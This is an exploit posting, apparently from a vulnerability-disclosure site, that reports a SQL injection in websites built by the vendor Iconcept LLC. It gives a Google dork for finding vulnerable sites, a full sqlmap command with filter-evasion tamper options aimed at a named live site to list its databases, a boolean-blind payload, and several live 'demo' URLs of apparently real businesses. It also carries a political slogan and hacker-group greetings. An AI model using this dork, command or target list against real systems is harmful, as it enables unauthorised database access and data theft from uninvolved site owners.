Dubai Iconcept LLC Sql Injection Vulnerability

2017.12.22
tr Turkz.org (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################################# # Exploit Title: Dubai Iconcept LLC Sql İnjection Vulnerability # Author : TrazeR & Sipahiler & TurkZ.org # Google Dork : intext:"Powered by Iconcept LLC" inurl:pr_id= # Tested on : Kali Linux 2017.3 # Date : 22.12.2017 # Vendor Home: http://iconceptme.com/ # Blog : http://www.trazer.org/ # Forum : http://www.turkz.org/Forum/ # Telegram: https://t.me/turkzgrup ################################################################################# Tutorial : [+] Dorking İn Google Or Other Search Enggine [+] Sqlmap Or Manuel [+] Manager: localhost.com/admin/ [+] Sql GET Parameter "pr_id" İs Vulnerable. Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.maqammed.ae/product.php?pr_id=258" --tamper=space2comment,randomcase --dbs Parameter: pr_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pr_id=258 AND 7960=7960 Demo Sql: http://www.dynaspex.com/safinat/product.php?pr_id=1480#popup1 http://www.cvision.ae/product.php?pr_id=39 http://www.maqammed.ae/product.php?pr_id=258 FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR! Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen

References:

http://www.trazer.org/
http://www.turkz.org/Forum/
https://t.me/turkzgrup


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top